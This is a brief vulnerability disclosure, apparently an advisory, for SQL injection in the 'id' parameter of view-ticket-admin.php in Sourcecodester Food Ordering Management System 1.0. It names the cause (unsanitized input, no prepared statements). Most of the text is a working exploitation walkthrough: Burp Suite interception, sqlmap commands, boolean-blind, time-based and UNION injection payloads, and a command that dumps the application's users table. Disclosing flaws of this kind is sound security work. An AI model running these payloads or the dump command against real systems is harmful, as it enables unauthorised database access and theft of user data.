SQL Injection vulnerability was discovered from Sourcecodester Food Ordering Management System 1.0 (view-ticket-admin.php)
Affected Project: Sourcecodester Food Ordering Management System 1.0 Official Website: https://www.sourcecodester.com/php/15689/food-ordering-management-system-php-and-mysql-free-source-code.html Version: 1.0
Related Code file: view-ticket-admin.php
Injection parameter: id
-
Lack of Input Validation and Sanitization: The id fields are directly used in the SQL query without any sanitization or validation. This allows an attacker to manipulate the SQL query by injecting malicious SQL code.
-
Use of Plain SQL Queries: The script likely uses plain SQL queries to interact with the database. Without prepared statements, this approach is highly vulnerable to SQL injection.
Below is the view-ticket-admin.php:
http://172.16.76.1/foms/view-ticket-admin.php
We will first intercept the view-ticket traffic using Burp Suite:
Save the intercepted request to a .txt file and execute sqlmap towards it.
id price is vulnerable to boolean-based blind sql injection
Below commands verifies the vulnerability:
sqlmap -r foms-view-ticket-admin.txt --batch
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5820=5820
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 1153 FROM (SELECT(SLEEP(5)))TJiA)
Type: UNION query
Title: Generic UNION query (NULL) - 8 columns
Payload: id=-3013 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176716b71,0x674f514145744f534654486259594c6e6d63775669714f656656796b687747487963774273506755,0x716a6a6a71),NULL,NULL-- -
---
sqlmap -r foms-view-ticket-admin.txt --batch --dbs
sqlmap -r foms-view-ticket-admin.txt --batch --dbs -D foms_db -T users --dump